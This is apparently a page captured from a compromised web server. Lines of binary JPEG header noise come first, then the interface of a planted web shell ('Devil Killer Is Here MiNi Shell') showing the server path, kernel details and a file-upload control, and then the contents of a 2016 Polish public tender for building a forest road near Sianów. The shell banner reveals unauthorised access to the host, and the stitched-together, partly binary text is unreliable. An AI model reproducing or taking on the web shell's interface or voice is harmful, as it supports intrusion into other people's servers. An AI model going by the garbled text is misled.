JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160602/65561-N-2016.html

<p class="kh_header"><b>Sianów: Roboty budowlane (drogowe)
Budowa drogi leśnej Nr 11 na terenie leśnictw Chełmoniewo i Koszalin - II etap o długości 1,400 km.
Nr sprawy: SA.270.3.3.2016</b><br>
<b>Numer ogłoszenia: 65561 - 2016; data zamieszczenia: 02.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Karnieszewice , Trawica 8A, 76-004 Sianów, tel. 094 3185227, 3185228.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.karnieszewice.szczecinek.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jed. org. nieposiadająca osobowości prawnej zarządzająca mieniem skarbu państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane (drogowe)
Budowa drogi leśnej Nr 11 na terenie leśnictw Chełmoniewo i Koszalin - II etap o długości 1,400 km.
Nr sprawy: SA.270.3.3.2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane (drogowe):
Budowa drogi leśnej Nr 11 na terenie leśnictw Chełmoniewo i Koszalin - II etap o długości 1,400 km, a także wykonanie usług innych czynności, niezbędnych do wykonania budowy drogi.
Wykonawca winien wykonać roboty budowlane i przekazać Zamawiającemu dokumentację powykonawczą w sposób umożliwiający Inwestorowi złożenie zawiadomienia właściwego organu nadzoru budowlanego o zakończeniu budowy.
Wykonawca wykona pełną obsługę geodezyjną inwestycji zgodnie z przepisami rozporządzenia Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995 r. w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie (Dz. U. z 1995 r. Nr 25, poz. 133), wraz z opracowaniem dokumentacji geodezyjnej (inwentaryzacji powykonawczej) zgodnie z Art. 57 ust. 1 pkt 5 Ustawy prawo budowlane, którą 
w terminie 7 dni od daty zgłoszenia robót do odbioru końcowego złoży do właściwego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej. Potwierdzenie złożenia ww. opracowania Wykonawca jest zobowiązany bezzwłocznie przedstawić Zamawiającemu.
Droga leśna przebiega przez grunty Skarbu Państwa będące w zarządzie Lasów Państwowych - Nadleśnictwo Karnieszewice. Trasa drogi nie narusza stanu prawnego osób trzech.
2. Stan  istniejący
Przedmiotem niniejszego zamówienia jest budowa II etapu drogi leśnej Nr 11 na istniejącej drodze leśnej gruntowej położonej w Nadleśnictwie Karnieszewice, na terenie leśnictw Chełmoniewo i Koszalin, uszkodzonej w wyniku eksploatacji oraz zmiennych warunków atmosferycznych o łącznej długości 1+400,00 km. Droga nie posiada żadnych utwardzeń, co spowodowało powstawanie w trakcie jej użytkowania głębokich kolein uniemożliwiających sprawne przemieszczanie się pojazdów transportujących drewno jak również służb leśnych. Droga ma swój początek             w pobliżu miejscowości Kłos a kończy się na połączeniu ze zjazdem z drogi krajowej nr 6. Przedmiotowa droga leśna w zależności od natężenia ruchu danego odcinka oraz zalegających gruntów charakteryzuje się dużym zróżnicowaniem w rodzaju nawierzchni oraz stopniem ich degradacji. Cechą wspólną wszystkich odcinków jest niedostateczna skuteczność odprowadzania wód opadowych z korpusu drogi, co jest skutkiem zalegania gruntów nienośnych oraz tworzeniem się licznych zastoisk wody opadowej. Prowadzi to do deformacji drogi, tworzenia się niecek i błota, co uniemożliwia sprawny przejazd pojazdów. Następstwem tego stanu jest nienormatywne poszerzenie jezdni drogi, które umożliwia przejazd w miejscach szczególnie uciążliwych. Średnia szerokość istniejącej nawierzchni drogi wynosi około 3,00÷3,50 m. Droga posiada nieregularne pobocze gruntowe w znacznym stopniu zawyżone, co uniemożliwia sprawny odpływ wód opadowych z korpusu drogi. Odwodnienie drogi odbywa się za pomocą istniejących spadków podłużnych oraz poprzecznych. Taki sposób odwodnienia drogi przy zawyżonych poboczach i braku wzmocnienia odcinków o słabym poboczu gruntowym skutkuje licznymi wymyciami, tworzeniem się lokalnych zastoisk wody oraz zaniżeń w miejscach powstających kolein. 
Droga przebiega w terenie mocno zróżnicowanym wysokościowo.    
Droga prowadzi przez oddziały leśne 301, 300, 310, 316, 315, 317, 327, 326, 337 
i 336. 
Projekt budowy drogi leśnej nr 11 obejmuje istniejącą drogę gruntową wzmocnioną miejscowo kruszywem łamanym.
Korona drogi jest wyraźnie wyznaczona w terenie przez ślady ruchu kołowego.
Badanie makroskopowe gruntu wykazały, występowanie piasków drobnych a w km 2+000 występowanie gliny piaszczystej.
Jezdnia nawierzchni posiada liczne koleiny, wyboje, zastoiska wody i nierówności.
W części środkowej jezdni oraz na poboczach zalegają grunty organiczne naniesione podczas użytkowania drogi. Istniejące rowy są częściowo zamulone oraz porośnięte roślinnością gęstą i porośnięte krzewami. 
Łuki poziome nawierzchni wymagają korekty. 
Ze względu na roślinność i zakrzaczenie zarówno pobocza jak i rowy nie spełniają swojej funkcji związanej z odprowadzeniem wód opadowych, co jest przyczyną ich zalegania na jezdni.
Skrzyżowania dróg leśnych z drogą gruntową są rozjeżdżone.
Zjazdy wymagają profilowania, częściowo podwyższenia oraz utwardzenia.
Budowana droga zlokalizowana jest w obszarze chronionego krajobrazu Koszaliński Pas Nadmorski, którego celem powołania jest ochrona wartości przyrodniczych, historycznych i kulturowych, jak również krajobrazowych, na którym obowiązują zakazy zgodnie z przepisami Uchwały nr XXXII/375/09 Sejmiku Województwa Zachodniopomorskiego z dnia 15 września 2009r. w sprawie obszarów chronionego krajobrazu (tekst jednolity Dz. U. Woj. Zach., poz. 1637 z dnia 14 kwietnia 2014r.). 
Z przeprowadzonej wstępnej analizy oddziaływania na środowisko inwestycji metod ochrony i zabezpieczeń opisanych w Karcie Informacyjnej Przedsięwzięcia stwierdzono na etapie wydanej decyzji o środowiskowych uwarunkowaniach nr 9/14 z dnia 9 września 2014r., że planowane przedsięwzięcie nie wpłynie niekorzystnie na ochronę przyrody chronionego krajobrazu pn. Koszaliński Pas Nadmorski. 
Na terenie planowanej inwestycji nie zinwentaryzowano chronionych gatunków roślin i zwierząt.
3. Stan  projektowany 
I.	 PLAN SYTUACYJNY 
Początek drogi zaczyna się za zjazdem z drogi powiatowej nr 5535Z ul. Słupska na styku oddziałów 336/335 a kończy się przed zjazdem z drogi krajowej nr 6 ul. Gdańska na styku oddziałów 301/309. 
Łuki poziome na zjazdach R=  5, 6, 7, 8, 9, 11m.
Droga mieści się w oddziałach 301, 300, 310, 317, 316, 315, 327, 326, 337, 336.
II.	PARAMETRY TECHNICZNE DROGI, MIJANEK I ZJAZDÓW 
-	Długość całkowita budowanej drogi - 3.026,06 m,
-	Długość odcinka drogi będącego przedmiotem niniejszego zamówienia 1,400 km (odcinek 1+400 ÷ 2+800)
-	Klasa - L3,
-	Ilość jezdni/ ilość pasów ruchu - 1/1,
-	Grupa nośności podłoża - G1,
-	Szerokość jezdni - 3,00 +2x0,30 m = 3,60 m,
-	Obustronne pobocza - 0,75 m,
-	Spadek daszkowy dla nawierzchni 3,0 %, 
-	Spadek jednostronny dla nawierzchni 3,0 %, 
-	Spadek poprzeczny  dla pobocza 6-8 %,
-	Prędkość projektowana - 30 km/h,
-	Obciążenie ruchem poniżej 10 pojazdów ciężarowych na dobę,
-	Nacisk na oś - 10 ton,
-	Promień zjazdów -  5, 6, 7, 8, 9, 11 m,
-	Mijanki o długości 23 m i szerokości 3,00 m. Skosy najazdowe 1:7,
III.	ROZWIĄZANIE WYSOKOŚCIOWE
Nierówności należy zniwelować na etapie robót ziemnych związanych z miejscowym poszerzeniem oraz wykonaniem profilowania warstw dolnych.
IV.	KONSTRUKCJA NAWIERZCHNI
# Konstrukcja nawierzchni z płyt betonowych typu YOMB (75x100x12cm) dwa pasy dzielone w km 0+000÷0+185:
- Wykonanie górnej warstwy z płyt betonowych typu YOMB (75x100x12cm) - grubość 12 cm, 
- Wykonanie górnej warstwy pomiędzy dwoma rzędami płyt YOMB z kruszywa łamanego stabilizowanego mechanicznie ze skał litych frakcji 0-31,5mm - grubości 12 cm,
- Warstwa górna podbudowy z kruszywa łamanego stabilizowanego mechanicznie ze skał litych frakcji 0-31,5mm - grubości 10 cm,
- Warstwa górna podbudowy wyrównanie i zagęszczenie do wskaźnika 1,00%,
- Wykonanie warstwy odsączającej z pospółki 0-63 mm - grubości 10 cm,
- Geowłóknina separacyjna polipropylenowa typu np.: TYPAR SF40 lub równoważna,
- Koryto głębokości od 1 cm do 20 cm (usunięcie górnej warstwy humusu),
- Wyrównanie i zagęszczenie dna wykopu do wskaźnika 0,95%,
- Istniejący grunt rodzimy,
- Pobocza gruntowe do uzupełnienia gruntem pozyskanym z koryta i wykopu rowów przydrożnych do uzyskania spadków 6-8%,
# Konstrukcja nawierzchni z płyt betonowych typu YOMB (75x100x12cm) dwa pasy dzielone w km 0+185÷3+026,06:
-	Wykonanie górnej warstwy z płyt betonowych typu YOMB (75x100x12cm) - grubość 12 cm, 
-	Wykonanie górnej warstwy pomiędzy dwoma rzędami płyt YOMB z kruszywa łamanego stabilizowanego mechanicznie ze skał litych frakcji 0-31,5mm - grubości 12cm,
-	Warstwa górna podbudowy z kruszywa łamanego stabilizowanego mechanicznie ze skał litych frakcji 0-31,5mm - grubości 10cm,
-	Warstwa górna podbudowy wyrównanie i zagęszczenie do wskaźnika 1,00%,
-	Wykonanie warstwy odsączającej z pospółki 0-63mm - grubości 10cm,
-	Koryto głębokości od 1 cm do 20 cm (usunięcie górnej warstwy humusu),
-	Wyrównanie i zagęszczenie dna wykopu do wskaźnika 0,95%,
-	Istniejący grunt rodzimy,
-	Pobocza gruntowe do uzupełnienia gruntem pozyskanym z koryta do uzyskania spadków 6-8%,
* Konstrukcja zjazdów:
-	 Wykonanie górnej warstwy z kruszywa łamanego stabilizowanego mechanicznie ze skał litych frakcji 0-31,5 mm - grubość warstwy 12 cm,
- 	Wykonanie warstwy odsączającej z pospółki 0-63mm - grubości 10cm,
-	Koryto głębokości od 1 cm do 20 cm (usunięcie górnej warstwy humusu),
-	Wyrównanie i zagęszczenie dna wykopu do wskaźnika 0,95%,
-	Istniejący grunt rodzimy,
* Konstrukcja nawierzchni mijanek:
-	Wykonanie górnej warstwy z kruszywa łamanego stabilizowanego mechanicznie ze skał litych frakcji 0-31,5 mm  - grubość warstwy 12cm,
-	Wykonanie warstwy odsączającej z pospółki 0-63mm - grubości 10cm,
-	Koryto głębokości od 1 cm do 10 cm (usunięcie górnej warstwy humusu),
-	Wyrównanie i zagęszczenie dna wykopu do wskaźnika 0,95%,
-	Istniejący grunt rodzimy.
* Konstrukcja poboczy:
- na szerokości 30cm od krawędzi płyty, co przedstawiono na przekrojach: AA, BB, B1B1, CC, EE, GG, HH, II: 
* Wykonanie górnej warstwy z kruszywa łamanego stabilizowanego mechanicznie ze skał litych frakcji 0-31,5mm - grubości 12cm,
* Warstwa górna podbudowy z kruszywa łamanego stabilizowanego mechanicznie ze skał litych frakcji 0-31,5mm - grubości 10cm,
* Warstwa górna podbudowy wyrównanie i zagęszczenie do wskaźnika 1,00%,
* Wykonanie warstwy odsączającej z pospółki 0-63mm - grubości 10cm,
* Koryto głębokości od 1 cm do 10 cm (usunięcie górnej warstwy humusu),
* Wyrównanie i zagęszczenie dna wykopu do wskaźnika 0,95%,
* Istniejący grunt rodzimy,
- na szerokości 45cm: grunt rodzimy pozyskany z koryta - grubość warstwy 22cm,
V.	ODWODNIENIE, ROBOTY ZIEMNE
Odwodnienie jezdni odbywa się poprzez spadki poprzeczne na pobocza i do rowów, które należy odtworzyć wg stanu istniejącego i przebudowywanego.
Istniejące rowy należy oczyścić na całym projektowanym odcinku oraz wykonać nowe w miejscach wyznaczonych w części graficznej.
Rowy należy wykonać o przekroju trapezowym ze spadkiem skarp 1:1,5 i szerokością kinety od 40 do 80 cm co przedstawiono w części graficznej. W miejscach zwężonych należy wykonać rowy o przekroju trójkątnym ze spadkiem skarpy 1:1,5 o głębokości 0,5m licząc od krawędzi pobocza do dna rowu.
Odprowadzaną wodę z korpusu drogowego należy kierować do lokalnych zagłębień oraz na tereny leśne i rowów odprowadzających.
* Przepusty:
Ze względu na zły stan istniejących przepustów betonowych należy dokonać demontażu istniejących zużytych elementów i wykonać przepusty z rur polipropylenowych typu PEHD. 
Zagęszczenie wokół rur należy wykonać ubijakiem mechanicznym do wskaźnika zagęszczenia gruntu 0,98. Na zakończeniu przepustów należy wykonać przyczółki betonowe lub ubezpieczenia wlotów i wylotów wykonać z kamienia naturalnego brukowego o wymiarach 18÷25 cm. Rury należy układać z minimalnym pochyleniem 1,0 %. 
Wykaz przepustów:
- 	w km 1+014 długości 8,5m o średnicy 50 cm wraz z przyczółkami betonowymi,
- 	w km 1+091 długości 6,5m o średnicy 50 cm wraz z przyczółkami betonowymi,
* Skrajnia:
Skrajnia poprzeczna nad korpusem jezdni winna być min 6,00 m, zaś wysokość skrajni 4,00 m.
* Roboty ziemne obejmują:
Prace ziemne obejmują odtworzenie rowów poprzecznych, mechaniczne wykarczowanie krzewów i poszycia gęstego jak również wykarczowanie pni drzew     o średnicy od 10 cm do 100 cm. 
Należy oczyścić rowy zachowując ciągłość odpływu wód z korpusu drogowego. 
Korektę niwelety należy wykonać podczas prac profilacyjnych. 
Prace ziemne należy prowadzić przy występowaniu wilgotności optymalnej gruntu. 
W przypadku nadmiernej wilgotności należy bezzwłocznie wstrzymać prace ziemne. 
Należy kontrolować odwodnienie robocze pasa drogowego prowadzonych robót. 
Przy zbyt małej wilgotności należy grunt zwilżyć wodą. 
* Wymagany sprzęt podstawowy podczas prowadzenia robót ziemnych:
- 	koparka kołowa 0,25 ÷ 0,40 m3,
- 	równiarka samojezdna min 100 kM,
- 	samochód samowyładowczy min 10 ton,
- 	spycharka gąsienicowa min 75 kM,
- 	walec statyczny samojezdny min 10 ton,
- 	walec wibracyjny samojezdny min 2,5 ton,
- 	ubijak spalinowy min 360 kg.
VI.	ZJAZDY, MIJANKI 
Remontowane zjazdy wymagają odtworzenia łuków. Przyjęto promienie łuków 5, 6, 7, 8, 9 i 11 m.
- 	Zjazd w km 0+320,5 szerokości 3,5m, długości 28m,
- 	Zjazd w km 0+795,5 szerokości 3,5m, długości 16,5m,
- 	Zjazd w km 0+998,25 szerokości 3,5m, długości 12m,
- 	Zjazd w km 1+017 szerokości 3,5m, długości 19m,
- 	Zjazd w km 1+186 szerokości 3,5m, długości 16,67m,
- 	Zjazd w km 1+450 szerokości 3,5m, długości 22,5m,
- 	Zjazd w km 1+491, szerokości 3,5m, długości 15,5m,
- 	Zjazd w km 1+491 szerokości 3,5m, długości 14,5m,
- 	Zjazd w km 1+979 szerokości 3,5m, długości 23,5m,
- 	Zjazd w km 2+079 szerokości 3,5m, długości 20m,
- 	Zjazd w km 2+428 szerokości 3,5m, długości 13m,
- 	Zjazd w km 2+425,10 szerokości 3,5m, długości 16,8m,
- 	Zjazd w km 2+763,34 szerokości 3,5m, długości 18,78m,
- 	Zjazd w km 2+917,87 szerokości 3,5m, długości 18,22m,
Lokalizację przedstawiono w części graficznej.
Mijanki o długości 23 m i szerokości 3,00 m. Skosy najazdowe 1:7:
-	Mijanka w km 0+096,10-0+154,30 szerokości 3,0m, 
-	Mijanka w km 0+307-0+368,10 szerokości 3,0m, 
-	Mijanka w km 0+395-0+453 szerokości 3,0m, 
-	Mijanka w km 0+582,55-0+654,80 szerokości 3,0m, 
-	Mijanka w km 0+762,75-0+825,93 szerokości 3,0m, 
-	Mijanka w km 0+960,68-1+023,90 szerokości 3,0m, 
-	Mijanka w km 1+301,03-1+360,10 szerokości 3,0m, 
-	Mijanka w km 1+600,00-1+665,00 szerokości 3,0m, 
-	Mijanka w km 2+053,30-2+115,90 szerokości 3,0m, 
-	Mijanka w km 2+256,32-2+317,75 szerokości 3,0m, 
-	Mijanka w km 2+524,48-2+585,96 szerokości 3,0m, 
-	Mijanka w km 2+735,35-2+798,00 szerokości 3,0m, 
Lokalizację przedstawiono w części graficznej. 
Mijanki będące przedmiotem zamówienia opisano pogrubioną czcionką.
VII.	URZĄDZENIA BEZPIECZEŃSTWA RUCHU 
Prace budowlane należy odpowiednio zabezpieczyć stosując taśmę ostrzegawczą oraz tablice informacyjne. Na początku i końcu odcinka prac należy ustawić znaki ostrzegawcze A14 Roboty na drodze lub zamknąć drogę dla ruchu kołowego i ustawić na końcowych odcinkach znak B2 Zakaz wjazdu. Szczegóły oznakowania należy uzgodnić z Inwestorem i Inspektorem Nadzoru.
4. Lokalizacja inwestycji:
Na terenie leśnictw Chełmoniewo i Koszalin.
Koszalin: 
- obręb 0034 nr ewidencyjny gruntu (działki): 300/2, 301/4, 310/1
- obręb 0035 nr ewidencyjny gruntu (działki): 315, 316, 317, 326, 327, 336/1, 337/1.
Lokalizacja odcinka drogi będącego przedmiotem zamówienia:
- działki nr 315, 316, 317 w obrębie 0035 Koszalin,
- działki nr 310/1 w obrębie 0034 Koszalin.
5. Szczegółowy opis przedmiotu zamówienia określony został w: 
a) dokumentacji projektowej (projekt budowlany)
b) Specyfikacjach Technicznych Wykonania i Odbioru Robót
c) przedmiarze robót 
Wartość zamówienia nie przekracza kwoty określonej w art. 11 ust. 8 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity z 28 maja 2013r. Dz. U. z 2013 r., poz. 907) z późniejszymi zmianami..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>1. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających,
o których mowa w art. 67 ust. 1 pkt 6. Zamówienia uzupełniające dotyczą powtórzenia robót objętych zamówieniem podstawowym tego samego rodzaju zamówień 
o wartości do 50% zamówienia podstawowego (roboty dotyczące budowy drogi leśnej Nr 11 o nawierzchni twardej ulepszonej - płyty betonowe typu JOMB w na terenie leśnictw Chełmoniewo i Koszalin.
2. Zamawiający przewiduje możliwość udzielenia zamówień dodatkowych, jeśli spełnione zostaną przesłanki udzielenia takiego zamówienia, określone w art. 67 ust.1 pkt 5 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.31.40-3, 45.23.31.23-7, 45.23.32.26-9, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 13.000,00 złotych (słownie: trzynaście tysięcy 00/100 złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowych warunków udziału w postępowaniu dotyczących posiadania uprawnień do wykonywania określonej działalności. Wykonawca w tym zakresie złoży oświadczenie o spełnieniu warunków udziału           w postępowaniu. 
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże że w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej trzy zamówienia (zadania) polegające na budowie lub przebudowie dróg o nawierzchni      z płyt żelbetowych oraz tłuczniowej o wartości każdego zamówienia (zadania) co najmniej 300.000,00 zł netto (słownie: trzysta tysięcy 00/100 złotych), tzn. co najmniej dwóch o nawierzchni z płyt żelbetowych i jednej o nawierzchni tłuczniowej lub co najmniej jednej o nawierzchni z płyt żelbetowych i dwóch o nawierzchni tłuczniowej lub trzech o nawierzchni tłuczniowo-płytowej.
-  Wykonawca w tym zakresie złoży oświadczenie o spełnianiu warunków udziału        w postępowaniu oraz dokumenty wskazane p. XI specyfikacji. 
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował sprzętem mechanicznym: samochód samowyładowczy (min. 1 szt.) o ładowności powyżej 5,0 ton (wskazane około 12 ton), koparko-ładowarką lub koparką (min. 1 szt.), równiarką drogową samojezdną (min. 1 szt.) lub/i spycharką (min. 1 szt.) oraz walcem drogowym (min. 1 szt.); 
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował osobą posiadającą uprawnienia do kierowania robotami budowlanymi drogowymi, aktualny wpis do właściwej izby inżynierskiej i ubezpieczenie odpowiedzialności cywilnej    
Wykonawca w tym zakresie złoży oświadczenie o spełnieniu warunków udziału           w postępowaniu oraz wykaz osób odpowiedzialnych za kierowanie robotami.
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli:
- wykaże posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia (roboty budowlane - drogowe), przy czym kwota tego ubezpieczenia nie może być mniejsza niż 600.000,00 złotych
- Ocena nastąpi według formuły spełnia / nie spełnia.</p>
